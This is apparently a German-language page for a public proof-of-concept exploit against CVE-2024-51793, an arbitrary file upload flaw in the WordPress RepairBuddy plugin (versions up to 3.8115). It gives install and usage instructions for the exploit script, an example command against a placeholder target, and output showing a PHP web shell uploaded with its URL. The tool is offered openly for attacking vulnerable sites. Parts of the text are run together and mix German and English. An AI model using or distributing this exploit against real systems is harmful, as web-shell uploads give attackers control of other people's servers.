
WordPress RepairBuddy Plugin <= 3.8115 - Schwachstelle für beliebigen Dateiupload
CVE-ID: CVE-2024-51793
Veröffentlicht: 2024-11-11
Aktualisiert: 2024-11-11
Titel: WordPress RepairBuddy Plugin <= 3.8115 - Schwachstelle für beliebigen Dateiupload
Beschreibung:
Schwachstelle für uneingeschränkten Upload von Dateien mit gefährlichem Typ in Webful Creations Computer Repair Shop ermöglicht das Hochladen einer Web-Shell auf einen Webserver. Dieses Problem betrifft Computer Repair Shop: von n/a bis 3.8115.
CWE:
CVSS:
Dies ist ein Proof-of-Concept-Exploit für die Schwachstelle für beliebigen Dateiupload in WordPress RepairBuddy Plugin Versionen <= 3.8115. Der Exploit ermöglicht es einem Angreifer, eine Web-Shell auf den verwundbaren Server hochzuladen.
requests-Bibliothek ()pip install requestsusage:
CVE-2024-51793.py [-h] -u URL [-shell SHELL]
WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.
Optionen:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u, --url URL Ziel-URL
-shell SHELL Shell-Code zum Hochladen
python
CVE-2024-51793.py -u http://target.com/wordpress
Exploit By : Nxploit Khaled Alenazi,
🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
Exploit von: Nxploited, Khaled Alenazi